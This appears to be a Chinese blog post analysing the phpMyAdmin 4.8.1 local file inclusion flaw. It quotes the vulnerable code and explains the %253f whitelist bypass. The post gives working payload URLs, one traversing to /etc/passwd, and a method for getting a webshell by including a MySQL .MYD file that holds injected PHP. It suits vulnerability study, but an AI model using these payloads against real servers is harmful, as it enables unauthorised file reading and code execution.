0x00 phpmyadmin简述
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
0x01 影响版本
phpmyadmin 4.8.1
之前的版本没有测试
注:需要登录phpmyadmin才可利用
0x02漏洞分析
查看index.php 55~63行代码
if (! empty($_REQUEST[‘target‘]) ???&& is_string($_REQUEST[‘target‘]) ???&& ! preg_match(‘/^index/‘, $_REQUEST[‘target‘]) ???&& ! in_array($_REQUEST[‘target‘], $target_blacklist) ???&& Core::checkPageValidity($_REQUEST[‘target‘])) { ???include $_REQUEST[‘target‘]; ???exit;}条件为真(条件):
- $_REQUEST[‘target‘] 不能为空
- $_REQUEST[‘target‘] 是字符串
- $_REQUEST[‘target‘] 不能以index开头
- $_REQUEST[‘target‘] 不能在$target_blacklist;而$target_blacklist = array (‘import.php‘, ‘export.php‘);
- 需要满足Core::checkPageValidity($_REQUEST[‘target‘])
Core::checkPageValidity($_REQUEST[‘target‘]),查看phpMyAdmin1\libraries\classes\core.php
checkPageValidity 函数具体代码:
public static function checkPageValidity(&$page, array $whitelist = []) ???{ ???????if (empty($whitelist)) { ???????????$whitelist = self::$goto_whitelist; ???????} ???????if (! isset($page) || !is_string($page)) { ???????????return false; ???????} ???????if (in_array($page, $whitelist)) { ???????????return true; ???????} ???????$_page = mb_substr( ???????????$page, ???????????0, ???????????mb_strpos($page . ‘?‘, ‘?‘) ???????); ???????if (in_array($_page, $whitelist)) { ???????????return true; ???????} ???????$_page = urldecode($page); ???????$_page = mb_substr( ???????????$_page, ???????????0, ???????????mb_strpos($_page . ‘?‘, ‘?‘) ???????); ???????if (in_array($_page, $whitelist)) { ???????????return true; ???????} ???????return false; ???}出现问题的代码:
$_page = urldecode($page); ???????$_page = mb_substr( ???????????$_page, ???????????0, ???????????mb_strpos($_page . ‘?‘, ‘?‘) ???????); ???????if (in_array($_page, $whitelist)) { ???????????return true; ???????}在请求的链接中包含%253即可绕过,那可以构造的链接有:
db_sql.php%253/../../../../../../etc/passwd
db_sql.php可以替换成一下:
‘db_datadict.php‘, ???????‘db_sql.php‘, ???????‘db_events.php‘, ???????‘db_export.php‘, ???????‘db_importdocsql.php‘, ???????‘db_multi_table_query.php‘, ???????‘db_structure.php‘, ???????‘db_import.php‘, ???????‘db_operations.php‘, ???????‘db_search.php‘, ???????‘db_routines.php‘, ???????‘export.php‘, ???????‘import.php‘, ???????‘index.php‘, ???????‘pdf_pages.php‘, ???????‘pdf_schema.php‘, ???????‘server_binlog.php‘, ???????‘server_collations.php‘, ???????‘server_databases.php‘, ???????‘server_engines.php‘, ???????‘server_export.php‘, ???????‘server_import.php‘, ???????‘server_privileges.php‘, ???????‘server_sql.php‘, ???????‘server_status.php‘, ???????‘server_status_advisor.php‘, ???????‘server_status_monitor.php‘, ???????‘server_status_queries.php‘, ???????‘server_status_variables.php‘, ???????‘server_variables.php‘, ???????‘sql.php‘, ???????‘tbl_addfield.php‘, ???????‘tbl_change.php‘, ???????‘tbl_create.php‘, ???????‘tbl_import.php‘, ???????‘tbl_indexes.php‘, ???????‘tbl_sql.php‘, ???????‘tbl_export.php‘, ???????‘tbl_operations.php‘, ???????‘tbl_structure.php‘, ???????‘tbl_relation.php‘, ???????‘tbl_replace.php‘, ???????‘tbl_row_action.php‘, ???????‘tbl_select.php‘, ???????‘tbl_zoom_select.php‘, ???????‘transformation_overview.php‘, ???????‘transformation_wrapper.php‘, ???????‘user_password.php‘,0x03通过文件包含获取webshell
前提条件首先知道数据库的路径
查看当前数据库的路径:
show variables like ‘datadir‘
我新建了一个数据库 tt,在tt数据库中添加一个了表,在表中插入了<?php phpinfo()?>
然后访问:http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD
0x04参考链接
https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
phpmyadmin 4.8.1任意文件包含
原文地址:http://blog.51cto.com/13770310/2131305